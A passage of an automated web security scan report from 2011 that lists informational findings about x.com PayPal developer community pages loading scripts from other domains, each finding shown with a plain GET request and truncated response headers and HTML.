<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.35. https://www.x.com/community/ppx/global/it

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/global/it

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /community/ppx/global/it HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:12 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323034333b31342c323133303b31342c323034323b31342c323030343b31342c323034313b31342c323034303b31342c323133313b31342c323033393b31342c323131343b31342c323133333b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:13 GMT; Path=/
Vary: User-Agent
JP: D=83031 t=1313157073107237
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.36. https://www.x.com/community/ppx/global/jp

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/global/jp

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /community/ppx/global/jp HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:13 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323133303b31342c323034323b31342c323034313b31342c323034333b31342c323030343b31342c323034303b31342c323133313b31342c323033393b31342c323131343b31342c323133333b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:13 GMT; Path=/
Vary: User-Agent
JP: D=64298 t=1313157073255195
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.37. https://www.x.com/community/ppx/global/mx

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/global/mx

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /community/ppx/global/mx HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:14 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323034343b31342c323133303b31342c323030343b31342c323034323b31342c323034333b31342c323034313b31342c323034303b31342c323133313b31342c323033393b31342c323131343b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:14 GMT; Path=/
Vary: User-Agent
JP: D=84686 t=1313157074147841
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.38. https://www.x.com/community/ppx/global/nl

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/global/nl

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /community/ppx/global/nl HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:14 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323034353b31342c323034333b31342c323133303b31342c323034343b31342c323030343b31342c323034323b31342c323034313b31342c323034303b31342c323133313b31342c323033393b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:14 GMT; Path=/
Vary: User-Agent
JP: D=74016 t=1313157074525656
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.39. https://www.x.com/community/ppx/global/sp

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/global/sp

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /community/ppx/global/sp HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:15 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323034363b31342c323034353b31342c323034343b31342c323034333b31342c323133303b31342c323030343b31342c323034323b31342c323034313b31342c323034303b31342c323133313b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:15 GMT; Path=/
Vary: User-Agent
JP: D=120118 t=1313157075242154
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.40. https://www.x.com/community/ppx/global/uk

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/global/uk

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /community/ppx/global/uk HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:15 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323034373b31342c323034343b31342c323034363b31342c323034353b31342c323034333b31342c323133303b31342c323030343b31342c323034323b31342c323034313b31342c323034303b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:15 GMT; Path=/
Vary: User-Agent
JP: D=132311 t=1313157075777765
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<div class="jive-i18nhtml-text-widget"><script src="http://widgets.twimg.com/j/2/widget.js" type="text/javascript"></script>
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.41. https://www.x.com/community/ppx/ipn

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/ipn

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /community/ppx/ipn HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:00 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323032383b31342c323032363b31342c323032373b31342c323032303b31342c323031383b31342c323036333b31342c323031373b31342c323030363b31342c323031363b31342c323234363b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:01 GMT; Path=/
Vary: User-Agent
JP: D=93490 t=1313157061548233
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.42. https://www.x.com/community/ppx/marketplaces

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/marketplaces

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /community/ppx/marketplaces HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:18 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323134323b31342c323134353b31342c323134333b31342c323030353b31342c323034373b31342c323034363b31342c323034353b31342c323034343b31342c323034333b31342c323133303b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:18 GMT; Path=/
Vary: User-Agent
JP: D=108959 t=1313157078551586
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>


<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynam
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynam
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.43. https://www.x.com/community/ppx/mass_pay

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/mass_pay

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /community/ppx/mass_pay HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:50:33 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323031313b31342c323030393b31342c323030373b31342c323030333b31342c323031343b31342c323030383b31342c323031303b31342c323031393b31342c323237363b31342c323237303b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:50:34 GMT; Path=/
Vary: User-Agent
JP: D=98932 t=1313157034722623
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.44. https://www.x.com/community/ppx/offlineanddevices

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/offlineanddevices

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /community/ppx/offlineanddevices HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:18 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323134363b31342c323134323b31342c323030353b31342c323134333b31342c323134353b31342c323034373b31342c323034363b31342c323034353b31342c323034343b31342c323034333b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:18 GMT; Path=/
Vary: User-Agent
JP: D=113532 t=1313157078857855
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>


<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynam
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynam
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.45. https://www.x.com/community/ppx/p2p

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/p2p

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /community/ppx/p2p HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:18 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323134343b31342c323134323b31342c323134333b31342c323134353b31342c323134363b31342c323030353b31342c323034373b31342c323034363b31342c323034353b31342c323034343b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:19 GMT; Path=/
Vary: User-Agent
JP: D=81213 t=1313157079302842
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>


<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynam
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynam
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.46. https://www.x.com/community/ppx/payflow_link

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/payflow_link

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /community/ppx/payflow_link HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:50:55 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323031333b31342c323236393b31342c323232313b31342c323235313b31342c323130303b31342c323038343b31342c323036333b31342c323036323b31342c323035323b31342c323035303b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:50:56 GMT; Path=/
Vary: User-Agent
JP: D=81349 t=1313157056540618
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.47. https://www.x.com/community/ppx/payflow_pro

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/payflow_pro

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /community/ppx/payflow_pro HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:50:32 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323031343b31342c323030393b31342c323030383b31342c323031303b31342c323031393b31342c323237363b31342c323237303b31342c323030353b31342c323030373b31342c323030343b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:50:33 GMT; Path=/
Vary: User-Agent
JP: D=271432 t=1313157033322018
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.48. https://www.x.com/community/ppx/payflow_xml_reporting

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/payflow_xml_reporting

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /community/ppx/payflow_xml_reporting HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:00 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323032373b31342c323032303b31342c323032363b31342c323031383b31342c323031373b31342c323036333b31342c323030363b31342c323031363b31342c323234363b31342c323031353b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:01 GMT; Path=/
Vary: User-Agent
JP: D=106498 t=1313157060903457
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.49. https://www.x.com/community/ppx/pdt

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/pdt

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /community/ppx/pdt HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:01 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323032393b31342c323033303b31342c323032303b31342c323032373b31342c323032383b31342c323036333b31342c323032363b31342c323031383b31342c323031373b31342c323030363b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:02 GMT; Path=/
Vary: User-Agent
JP: D=122974 t=1313157061920177
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.50. https://www.x.com/community/ppx/permissions

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/permissions

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /community/ppx/permissions HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:50:59 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323032303b31342c323032363b31342c323031363b31342c323031373b31342c323030363b31342c323031383b31342c323036333b31342c323234363b31342c323031353b31342c323031333b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:00 GMT; Path=/
Vary: User-Agent
JP: D=124196 t=1313157059978751
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.51. https://www.x.com/community/ppx/press

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/press

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /community/ppx/press HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:20 GMT
Server: Apache-Coyote/1.1
